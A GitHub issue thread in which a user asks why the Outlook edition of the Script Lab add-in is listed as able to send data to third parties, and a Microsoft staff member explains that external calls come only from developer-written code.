Closed Sotaur closed 1 year ago
Sotaur
commented
1 year ago Searching through the code nothing sticks out to me as hitting a third party other than the relatively obvious GitHub integration, but a lot of organizations (mine included) have sensitive information in email (e.g., PII, PHI, etc.) they don't want to risk leaking with a misstep in someone using this.
ElizabethSamuel-MSFT
commented
1 year ago @Sotaur Thanks for asking about this. My understanding is that Script Lab allows you as the developer to include calls in your code to external services. Therefore, such calls should be within your control and not a behavior required for Script Lab itself to function.
I'll see if we can refine that info in the add-in's description.
ElizabethSamuel-MSFT
commented
1 year ago @Sotaur To further clarify. The user is usually able to accept or reject changes made by their add-ins. However, with the introduction of Outlook features like append on send, the user may only see the final action after the email is sent. Script Lab for Outlook includes that text in the AppSource description because it supports these types of Outlook features. That support enables you to run existing Script Lab samples (e.g., Append text to item body on send) or create your own samples using those features.
In this case, the Script Lab samples that use these features don't call any external services. However, the description on AppSource is in place because any add-in that uses such features can include calls to external services. I encourage you to do similar due diligence with other such add-ins so you know what's being appended or prepended on send, for example, and can make an informed decision about the risk involved.
Thanks for your interest in Office Add-ins! I'll close this issue but let us know if you have any further questions.
On the AppSource pages for Script Lab, the flavor for Outlook calls out it can send data to third parties, but the flavor for Word, Excel, and Power Point doesn't call that out. This creates a few questions: